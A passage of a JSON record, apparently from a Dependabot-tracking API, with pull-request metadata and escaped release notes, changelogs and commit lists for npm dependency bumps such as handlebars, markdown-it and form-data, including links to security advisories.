\u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMerge tags v2.5.3 and v3.0.3 \u003ca href=\"https://github.com/form-data/form-data/commit/92613b9208556eb4ebc482fdf599fae111626fb6\"\u003e\u003ccode\u003e92613b9\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] migrate from travis to GHA \u003ca href=\"https://github.com/form-data/form-data/commit/806eda77740e6e3c67c7815afb216f2e1f187ba5\"\u003e\u003ccode\u003e806eda7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] migrate from travis to GHA \u003ca href=\"https://github.com/form-data/form-data/commit/8fdb3bc6b5d001f8909a9fca391d1d1d97ef1d79\"\u003e\u003ccode\u003e8fdb3bc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/41996f5ac73a867046d48512cab62e64fc846dad\"\u003e\u003ccode\u003e41996f5\u003c/code\u003e\u003c/a\u003e v4.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e [meta] actually ensure the readme backup isn’t published\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e [meta] fix readme capitalization\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e [meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e [Tests] fix linting errors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e [Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e [Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/d8d67dc8ac79285154edf7d3f57dbab593b9a146\"\u003e\u003ccode\u003ed8d67dc\u003c/code\u003e\u003c/a\u003e v4.0.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e [meta] remove local commit hooks\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.0...v4.0.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~ljharb\"\u003eljharb\u003c/a\u003e, a new releaser for form-data since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepublish\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `gatsby` from 4.23.1 to 4.25.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/gatsbyjs/gatsby/releases\"\u003egatsby's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003egatsby-source-wordpress@7.13.5 and 6 more...\u003c/h2\u003e\n\u003cp\u003e2024-08-26\u003c/p\u003e\n\u003ch2\u003eUpdated packages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003egatsby-source-wordpress@7.13.5\u003c/li\u003e\n\u003cli\u003egatsby-remark-responsive-iframe@6.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-prismjs@7.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-images@7.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-images@6.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-graphviz@5.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-copy-linked-files@6.13.2\u003c/li\u003e\n\u003cli\u003egatsby-plugin-offline@6.13.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: pin cheerio (\u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/issues/39066\"\u003e#39066\u003c/a\u003e) by \u003ca href=\"https://github.com/gatsbybot\"\u003e\u003ccode\u003e@​gatsbybot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"...\n\n_Description has been truncated_","html_url":"https://github.com/iDereje/badges/pull/14","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/iDereje%2Fbadges/issues/14","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/14/packages"}},{"old_version":"9.2.1","new_version":"9.2.2","update_type":"patch","path":null,"pr_created_at":"2026-03-31T17:17:12.000Z","version_change":"9.2.1 → 9.2.2","issue":{"uuid":"4180930909","node_id":"PR_kwDORikVvM7PA7Eh","number":23,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 8 directories with 17 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-01T16:44:14.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-31T17:17:12.000Z","updated_at":"2026-04-01T16:44:16.000Z","time_to_close":84422,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":17,"packages":[{"name":"markdown-it","old_version":"13.0.2","new_version":"14.1.1","repository_url":"https://github.com/markdown-it/markdown-it"},{"name":"handlebars","old_version":"4.7.7","new_version":"4.7.9","repository_url":"https://github.com/handlebars-lang/handlebars.js"},{"name":"path-to-regexp","old_version":"8.2.0","new_version":"8.4.0","repository_url":"https://github.com/pillarjs/path-to-regexp"},{"name":"yaml","old_version":"1.10.2","new_version":"1.10.3","repository_url":"https://github.com/eemeli/yaml"},{"name":"@apollo/server","old_version":"4.13.0","new_version":"5.5.0","repository_url":"https://github.com/apollographql/apollo-server"},{"name":"nodemailer","old_version":"8.0.1","new_version":"8.0.4","repository_url":"https://github.com/nodemailer/nodemailer"},{"name":"simple-git","old_version":"3.21.0","new_version":"3.32.3","repository_url":"https://github.com/steveukx/git-js"},{"name":"@octokit/plugin-paginate-rest","old_version":"9.2.1","new_version":"9.2.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"bn.js","old_version":"4.12.0","new_version":"4.12.3","repository_url":"https://github.com/indutny/bn.js"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.13","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"ejs","old_version":"3.1.9","new_version":"3.1.10","repository_url":"https://github.com/mde/ejs"},{"name":"picomatch","old_version":"2.3.1","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"yauzl","old_version":"3.2.0","new_version":"3.2.1","repository_url":"https://github.com/thejoshwolfe/yauzl"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 13 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [markdown-it](https://github.com/markdown-it/markdown-it) | `13.0.2` | `14.1.1` |\n| [handlebars](https://github.com/handlebars-lang/handlebars.js) | `4.7.7` | `4.7.9` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `8.2.0` | `8.4.0` |\n| [yaml](https://github.com/eemeli/yaml) | `1.10.2` | `1.10.3` |\n| [@apollo/server](https://github.com/apollographql/apollo-server/tree/HEAD/packages/server) | `4.13.0` | `5.5.0` |\n| [nodemailer](https://github.com/nodemailer/nodemailer) | `8.0.1` | `8.0.4` |\n| [simple-git](https://github.com/steveukx/git-js/tree/HEAD/simple-git) | `3.21.0` | `3.32.3` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `9.2.1` | `9.2.2` |\n| [bn.js](https://github.com/indutny/bn.js) | `4.12.0` | `4.12.3` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.13` |\n| [ejs](https://github.com/mde/ejs) | `3.1.9` | `3.1.10` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n| [yauzl](https://github.com/thejoshwolfe/yauzl) | `3.2.0` | `3.2.1` |\n\nBumps the npm_and_yarn group with 8 updates in the /docs directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [glob](https://github.com/isaacs/node-glob) | `10.4.5` | `10.5.0` |\n| [tar](https://github.com/isaacs/node-tar) | `7.4.3` | `7.5.13` |\n| [ws](https://github.com/websockets/ws) | `7.5.8` | `7.5.10` |\n| [handlebars](https://github.com/handlebars-lang/handlebars.js) | `4.7.8` | `4.7.9` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `0.1.12` | `0.1.13` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.12` | `1.1.13` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.1` | `1.15.11` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n\nBumps the npm_and_yarn group with 1 update in the /packages/core/content-manager directory: [markdown-it](https://github.com/markdown-it/markdown-it).\nBumps the npm_and_yarn group with 1 update in the /packages/generators/generators directory: [handlebars](https://github.com/handlebars-lang/handlebars.js).\nBumps the npm_and_yarn group with 2 updates in the /packages/plugins/documentation directory: [path-to-regexp](https://github.com/pillarjs/path-to-regexp) and [yaml](https://github.com/eemeli/yaml).\nBumps the npm_and_yarn group with 1 update in the /packages/plugins/graphql directory: [@apollo/server](https://github.com/apollographql/apollo-server/tree/HEAD/packages/server).\nBumps the npm_and_yarn group with 1 update in the /packages/providers/email-nodemailer directory: [nodemailer](https://github.com/nodemailer/nodemailer).\nBumps the npm_and_yarn group with 1 update in the /packages/utils/upgrade directory: [simple-git](https://github.com/steveukx/git-js/tree/HEAD/simple-git).\n\nUpdates `markdown-it` from 13.0.2 to 14.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/markdown-it/markdown-it/blob/master/CHANGELOG.md\"\u003emarkdown-it's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[14.1.1] - 2026-01-11\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed regression from v13 in linkify inline rule. Specific patterns could\ncause high CPU use. Thanks to \u003ca href=\"https://github.com/ltduc147\"\u003e\u003ccode\u003e@​ltduc147\u003c/code\u003e\u003c/a\u003e for report.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[14.1.0] - 2024-03-19\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated CM spec compatibility to 0.31.2, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1009\"\u003e#1009\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed quadratic complexity when parsing references, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/996\"\u003e#996\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eFixed quadratic output size with pathological user input in tables, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1000\"\u003e#1000\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[14.0.0] - 2023-12-08\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDrop ancient browsers support (use \u003ccode\u003e.fromCodePoint\u003c/code\u003e and other features).\u003c/li\u003e\n\u003cli\u003eRewrite to ESM (including all plugins/deps). CJS fallback still available.\nNo signatures changed, except \u003ccode\u003emarkdown-it-emoji\u003c/code\u003e plugin.\u003c/li\u003e\n\u003cli\u003eDropped \u003ccode\u003edist/\u003c/code\u003e folder from repo, build on package publish.\u003c/li\u003e\n\u003cli\u003eSet \u003ccode\u003epunicode.js\u003c/code\u003e as external dependency.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eHtml tokens inside img alt are now rendered as their original text, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/896\"\u003e#896\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eHardbreaks inside img alt are now rendered as newlines.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/b4a9b659ef5734223731cfaa3ad5eacc6fc22918\"\u003e\u003ccode\u003eb4a9b65\u003c/code\u003e\u003c/a\u003e 14.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/4b4bbcae5e0990a5b172378e507b33a59012ed26\"\u003e\u003ccode\u003e4b4bbca\u003c/code\u003e\u003c/a\u003e Fixed perf regression in linkify-it wrapper\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/d2782d892a51201b25d3eeab172201ad5a53a24c\"\u003e\u003ccode\u003ed2782d8\u003c/code\u003e\u003c/a\u003e Add supplementary example-driven documentation (\u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1092\"\u003e#1092\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/0fe7ccb4b7f30236fb05f623be6924961d296d3d\"\u003e\u003ccode\u003e0fe7ccb\u003c/code\u003e\u003c/a\u003e 14.1.0 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/a367c44154d6c906c8652ed779af6a21f7eaed2e\"\u003e\u003ccode\u003ea367c44\u003c/code\u003e\u003c/a\u003e Fix typo in comments of text.mjs (\u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1015\"\u003e#1015\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/7ad81799725ef19627241f002fb1fa9cbd6a2a37\"\u003e\u003ccode\u003e7ad8179\u003c/code\u003e\u003c/a\u003e add changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/5e900639542bb36501ee9e960c07bfaa529431c9\"\u003e\u003ccode\u003e5e90063\u003c/code\u003e\u003c/a\u003e simplify logic in scanDelims\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/d7ce5ec66d3babcd165d432b68b3c55000349ccf\"\u003e\u003ccode\u003ed7ce5ec\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1009\"\u003e#1009\u003c/a\u003e from notriddle/spec-0.31.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/0bfc57de427b349865c4d85dccc7d4da00bca53f\"\u003e\u003ccode\u003e0bfc57d\u003c/code\u003e\u003c/a\u003e Update spec to 0.31.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/cd2477863fdcc182cc8739e9bedc7363acb344d8\"\u003e\u003ccode\u003ecd24778\u003c/code\u003e\u003c/a\u003e Update to comply with spec 0.31.2\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/markdown-it/markdown-it/compare/13.0.2...14.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `handlebars` from 4.7.7 to 4.7.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/handlebars-lang/handlebars.js/releases\"\u003ehandlebars's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.7.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: enable shell mode for spawn to resolve Windows EINVAL issue - e0137c2\u003c/li\u003e\n\u003cli\u003efix type \u0026quot;RuntimeOptions\u0026quot; also accepting string partials - eab1d14\u003c/li\u003e\n\u003cli\u003efeat(types): set \u003ccode\u003ehash\u003c/code\u003e to be a \u003ccode\u003eRecord\u0026lt;string, any\u0026gt;\u003c/code\u003e - de4414d\u003c/li\u003e\n\u003cli\u003efix non-contiguous program indices - 4512766\u003c/li\u003e\n\u003cli\u003erefactor: rename i to startPartIndex - e497a35\u003c/li\u003e\n\u003cli\u003esecurity: fix security issues - 68d8df5\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2w6w-674q-4c4q\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2w6w-674q-4c4q\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-3mfm-83xf-c92r\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-3mfm-83xf-c92r\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xhpv-hc6g-r9c6\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xhpv-hc6g-r9c6\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xjpj-3mr7-gcpf\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xjpj-3mr7-gcpf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-9cx6-37pm-9jff\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-9cx6-37pm-9jff\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2qvq-rjwj-gvw9\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2qvq-rjwj-gvw9\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-7rx3-28cr-v5wh\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-7rx3-28cr-v5wh\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-442j-39wm-28r2\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-442j-39wm-28r2\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.8...v4.7.9\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.7.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMake library compatible with workers (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1894\"\u003e#1894\u003c/a\u003e) - 3d3796c\u003c/li\u003e\n\u003cli\u003eDon't rely on Node.js global object (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1776\"\u003e#1776\u003c/a\u003e) - 2954e7e\u003c/li\u003e\n\u003cli\u003eFix compiling of each block params in strict mode (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1855\"\u003e#1855\u003c/a\u003e) - 30dbf04\u003c/li\u003e\n\u003cli\u003eFix rollup warning when importing Handlebars as ESM - 03d387b\u003c/li\u003e\n\u003cli\u003eFix bundler issue with webpack 5 (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1862\"\u003e#1862\u003c/a\u003e) - c6c6bbb\u003c/li\u003e\n\u003cli\u003eUse https instead of git for mustache submodule - 88ac068\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.7...v4.7.8\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/handlebars-lang/handlebars.js/blob/v4.7.9/release-notes.md\"\u003ehandlebars's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.7.9 - March 26th, 2026\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: enable shell mode for spawn to resolve Windows EINVAL issue - e0137c2\u003c/li\u003e\n\u003cli\u003efix type \u0026quot;RuntimeOptions\u0026quot; also accepting string partials - eab1d14\u003c/li\u003e\n\u003cli\u003efeat(types): set \u003ccode\u003ehash\u003c/code\u003e to be a \u003ccode\u003eRecord\u0026lt;string, any\u0026gt;\u003c/code\u003e - de4414d\u003c/li\u003e\n\u003cli\u003efix non-contiguous program indices - 4512766\u003c/li\u003e\n\u003cli\u003erefactor: rename i to startPartIndex - e497a35\u003c/li\u003e\n\u003cli\u003esecurity: fix security issues - 68d8df5\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.8...v4.7.9\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.7.8 - July 27th, 2023\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMake library compatible with workers (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1894\"\u003e#1894\u003c/a\u003e) - 3d3796c\u003c/li\u003e\n\u003cli\u003eDon't rely on Node.js global object (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1776\"\u003e#1776\u003c/a\u003e) - 2954e7e\u003c/li\u003e\n\u003cli\u003eFix compiling of each block params in strict mode (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1855\"\u003e#1855\u003c/a\u003e) - 30dbf04\u003c/li\u003e\n\u003cli\u003eFix rollup warning when importing Handlebars as ESM - 03d387b\u003c/li\u003e\n\u003cli\u003eFix bundler issue with webpack 5 (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1862\"\u003e#1862\u003c/a\u003e) - c6c6bbb\u003c/li\u003e\n\u003cli\u003eUse https instead of git for mustache submodule - 88ac068\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.7...v4.7.8\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/dce542c9a660048d31f0981ac8a45c08b919bddb\"\u003e\u003ccode\u003edce542c\u003c/code\u003e\u003c/a\u003e v4.7.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/8a41389ba5b2624b6f43a5463d8e2533b843a562\"\u003e\u003ccode\u003e8a41389\u003c/code\u003e\u003c/a\u003e Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2\"\u003e\u003ccode\u003e68d8df5\u003c/code\u003e\u003c/a\u003e Fix security issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/b2a083136b11e1da9f0f47a11f749a9830a49328\"\u003e\u003ccode\u003eb2a0831\u003c/code\u003e\u003c/a\u003e Fix browser tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/9f98c1629834abf8de5a127caff8a2eab03d2c12\"\u003e\u003ccode\u003e9f98c16\u003c/code\u003e\u003c/a\u003e Fix release script\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/45443b4290475dfb7cec32a85d344f12ab345eb9\"\u003e\u003ccode\u003e45443b4\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Improve partial indenting performance\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/8841a5f6d35096aee95d68e1e49636a4cb5c661e\"\u003e\u003ccode\u003e8841a5f\u003c/code\u003e\u003c/a\u003e Fix CI errors with linting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/e0137c26f2202593bca7cc25184e733e87d54709\"\u003e\u003ccode\u003ee0137c2\u003c/code\u003e\u003c/a\u003e fix: enable shell mode for spawn to resolve Windows EINVAL issue\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/e914d6037ffb0dd371f7e4823cdb019732ae66d7\"\u003e\u003ccode\u003ee914d60\u003c/code\u003e\u003c/a\u003e Improve rendering performance\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/7de4b41c344a5d702edca93d1841b59642fa32bd\"\u003e\u003ccode\u003e7de4b41\u003c/code\u003e\u003c/a\u003e Upgrade GitHub Actions checkout and setup-node on 4.x branch\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.7...v4.7.9\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~jaylinski\"\u003ejaylinski\u003c/a\u003e, a new releaser for handlebars since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `path-to-regexp` from 8.2.0 to 8.4.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pillarjs/path-to-regexp/releases\"\u003epath-to-regexp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.4.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eImportant\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix 